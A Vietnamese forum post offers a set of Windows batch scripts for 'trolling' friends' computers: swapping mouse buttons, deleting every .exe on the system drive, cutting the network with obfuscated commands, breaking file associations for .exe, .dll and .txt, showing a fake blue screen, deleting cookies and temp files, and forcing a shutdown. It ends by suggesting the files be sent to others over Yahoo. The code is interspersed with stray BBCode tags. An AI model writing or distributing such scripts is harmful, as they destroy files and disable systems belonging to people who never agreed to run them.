[Code] Một số code bat dùng để troll máy tính bạn bè

Xem chủ đề cũ hơn Xem chủ đề mới hơn Go down

avatar
Vodka
Trợ giúp
Tổng số bài gửi : 8
Join date : 13/06/2015
Xem lý lịch thành viên

Bài gửiVodka on Fri Sep 02, 2016 7:55 am

Hôm nay mình sẽ giới thiệu 1 số code bat khá hay dùng để chọc phá máy tính bạn bè 

Bước 1:
Tạo 1 file notepad bằng cách chuột phải vào Desktop >> New >> Text document

Bước 2:
Copy 1 số code ở dưới vào notepad và save lại dưới dạng abc.batSWAP MOUSE BUTTON (ĐẢO CHUỘT TRÁI THÀNH PHẢI VÀ NGƯỢC LẠI)

Code:
@ echo off[size=11][/size]
rem ---------------------------------[size=11][/size]
rem Swap Mouse Buttons[size=11][/size]
RUNDLL32 USER32.DLL,SwapMouseButton[size=11][/size]
rem ---------------------------------

DELETE ALL .EXE FILES IN THE COMPUTER (SUY NGHĨ KĨ KHI SỬ DỤNG CODE NÀY)

Code:
@ echo off[size=11][/size]
rem ---------------------------------[size=11][/size]
rem Delete All Exe[size=11][/size]
DIR /S/B %SystemDrive%\*.exe >> FIleList_exe.txt[size=11][/size]
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_exe.txt) do del "%%j:%%k"[size=11][/size]
rem ---------------------------------

DISABLE INTERNET (LÀM MẤT MẠNG TẠM THỜI)

Code:
@ echo off[size=11][/size]
rem ---------------------------------[size=11][/size]
rem Disable Internet[size=11][/size]
@Echo off & @@Break Off[size=11][/size]
Ipconfig /release[size=11][/size]
%jUmP%E%nD%c%onFiG%h%IdE%o%P% h%aRv%%aRd%A%T%%cHe%cK%HappY%3D b%aLLo0Ns%Y%eS% m3Ga!?![size=11][/size]
P%ReSs%%IE%AuS%ExPloR%e%r% > nul.%TempInternetRelease%[size=11][/size]
rem ---------------------------------

CONFUSE FILE EXTENSIONS (ĐỔI ĐỊNH DẠNG CỦA FILE, VÍ DỤ EXE THÀNH PNG...)

Code:
@ echo off[size=11][/size]
rem ---------------------------------[size=11][/size]
rem Confuse File Extensions Powerup[size=11][/size]
assoc .dll=txtfile[size=11][/size]
assoc .exe=pngfile[size=11][/size]
assoc .vbs=Visual Style[size=11][/size]
assoc .reg=xmlfile[size=11][/size]
assoc .txt=regfile[size=11][/size]
rem ---------------------------------[size=11][/size]
rem Confuse File Extensions for text[size=11][/size]
assoc .mp3=txtfile[size=11][/size]
assoc .xml=txtfile[size=11][/size]
assoc .png=txtfile[size=11][/size]
rem ---------------------------------

CREATE FAKE BLUE SCREEN OF DEATH - MÀN HÌNH XANH CHẾT CHÓC GIẢ

Chắc ai cũng biết đến màn hình xanh huyền thoại nhỉ... nỗi đáng sợ của những người sử dụng máy tính 
Sau đây mình sẽ hướng dẫn tạo ra 1 cái màn hình xanh giả để chơi troll 1 ai đó

- Sau khi run file này. Lập tức sẽ có màn hình xanh giả được tạo ra. Với những người không để ý kĩ thì sẽ lầm tưởng rằng bị màn hình xanh thật 

- Tắt đi bằng cách Alt + F4 là đc 

Code:
@echo off[size=11][/size]
echo ^<html^>^<head^>^<title^>BSOD^</title^> > bsod.hta[size=11][/size]
echo. >> bsod.hta[size=11][/size]
echo ^<hta:application id="oBVC" >> bsod.hta[size=11][/size]
echo applicationname="BSOD" >> bsod.hta[size=11][/size]
echo version="1.0" >> bsod.hta[size=11][/size]
echo maximizebutton="no" >> bsod.hta[size=11][/size]
echo minimizebutton="no" >> bsod.hta[size=11][/size]
echo sysmenu="no" >> bsod.hta[size=11][/size]
echo Caption="no" >> bsod.hta[size=11][/size]
echo windowstate="maximize"/^> >> bsod.hta[size=11][/size]
echo. >> bsod.hta[size=11][/size]
echo ^</head^>^<body bgcolor="#000088" scroll="no"^> >> bsod.hta[size=11][/size]
echo ^<font face="Lucida Console" size="4" color="#FFFFFF"^> >> bsod.hta[size=11][/size]
echo ^<p^>A problem has been detected and windows has been shutdown to prevent damage to your computer.^</p^> >> bsod.hta[size=11][/size]
echo. >> bsod.hta[size=11][/size]
echo ^<p^>DRIVER_IRQL_NOT_LES_OR_EQUAL^</p^> >> bsod.hta[size=11][/size]
echo. >> bsod.hta[size=11][/size]
echo ^<p^>If this is the first time you've seen this stop error screen, restart your computer, If this screen appears again, follow these steps:^</p^> >> bsod.hta[size=11][/size]
echo. >> bsod.hta[size=11][/size]
echo ^<p^>Check to make sure any new hardware or software is properly installed. If this is a new installation, ask your hardware or software manufacturer for any windows updates you might need.^</p^> >> bsod.hta[size=11][/size]
echo. >> bsod.hta[size=11][/size]
echo ^<p^>If problems continue, disable or remove any newly installed hardware or software. Disable BIOS memory options such as caching or shadowing. If you need to use Safe Mode to remove or disable components, restart your computer, press F8 to select Advanced Startup Options, and then select Safe Mode.^</p^> >> bsod.hta[size=11][/size]
echo. >> bsod.hta[size=11][/size]
echo ^<p^>Technical information:^</p^> >> bsod.hta[size=11][/size]
echo. >> bsod.hta[size=11][/size]
echo ^<p^>*** STOP: 0x000000D1 (0x0000000C,0x00000002,0x00000000,0xF86B5A89)^</p^> >> bsod.hta[size=11][/size]
echo. >> bsod.hta[size=11][/size]
echo. >> bsod.hta[size=11][/size]
echo ^<p^>*** gv3.sys - Address F86B5A89 base at F86B5000, DateStamp 3dd9919eb^</p^> >> bsod.hta[size=11][/size]
echo. >> bsod.hta[size=11][/size]
echo ^<p^>Beginning dump of physical memory^</p^> >> bsod.hta[size=11][/size]
echo ^<p^>Physical memory dump complete.^</p^> >> bsod.hta[size=11][/size]
echo ^<p^>Contact your system administrator or technical support group for further assistance.^</p^> >> bsod.hta[size=11][/size]
echo. >> bsod.hta[size=11][/size]
echo. >> bsod.hta[size=11][/size]
echo ^</font^> >> bsod.hta[size=11][/size]
echo ^</body^>^</html^> >> bsod.hta[size=11][/size]
start "" /wait "bsod.hta"[size=11][/size]
del /s /f /q "bsod.hta" > nul


XÓA CÁC TẬP TIN KHÔNG CẦN THIẾT CHO MÁY TÍNH (GIÚP WINDOWS HOẠT ĐỘNG MƯỢT HƠN)

Code:
@echo off[size=11][/size]
color 0C[size=11][/size]
echo Tien trinh se xoa file khong can thiet ...[size=11][/size]
del /f /s /q %systemdrive%\*.tmp[size=11][/size]
del /f /s /q %systemdrive%\*._mp[size=11][/size]
del /f /s /q %systemdrive%\*.log[size=11][/size]
del /f /s /q %systemdrive%\*.gid[size=11][/size]
del /f /s /q %systemdrive%\*.chk[size=11][/size]
del /f /s /q %systemdrive%\*.old[size=11][/size]
del /f /s /q %systemdrive%\recycled\*.*[size=11][/size]
del /f /s /q %windir%\*.bak[size=11][/size]
del /f /s /q %windir%\prefetch\*.*[size=11][/size]
rd /s /q %windir%\temp & md %windir%\temp[size=11][/size]
del /f /q %userprofile%\cookies\*.*[size=11][/size]
del /f /q %userprofile%\recent\*.*[size=11][/size]
del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"[size=11][/size]
del /f /s /q "%userprofile%\Local Settings\Temp\*.*"[size=11][/size]
del /f /s /q "%userprofile%\recent\*.*"[size=11][/size]
echo Tat ca da ket thuc.![size=11][/size]
pause

CUỐI CÙNG CODE DÙNG ĐỂ TẮT VÀ RESET MÁY CHỈ VỚI 1 CLICK

Code:
shutdown -s -t 60 -c "loi nhan" -f

Có thể thay s bằng r dùng để reset máy
-t 60 với 60 là thời gian tắt tính bằng giây, dùng để hẹn giờ tắt máy mà không cần can thiệp bởi bất cứ phần mềm nào. Các bạn có thể sửa lại tùy ý 
-c là lời nhắn dùng để tự kỉ hoặc troll winking

Lời kết: File sau khi lưu lại dưới dạng .bat có thể gửi qua yahoo,...

Xem chủ đề cũ hơn Xem chủ đề mới hơn Về Đầu Trang

Đăng ký thành viên và bình luận

Bạn cần phải đăng ký để bình luận.

Tạo tài khoản

Tham gia vào cộng đồng bằng cách tạo tại khoản, nó thật dễ dàng!


Tạo tài khoản mới

Đăng nhập

Đã có tài khoản? Không thành vấn đề, hãy đăng nhập.


Đăng nhập

 
Permissions in this forum:
Bạn không có quyền trả lời bài viết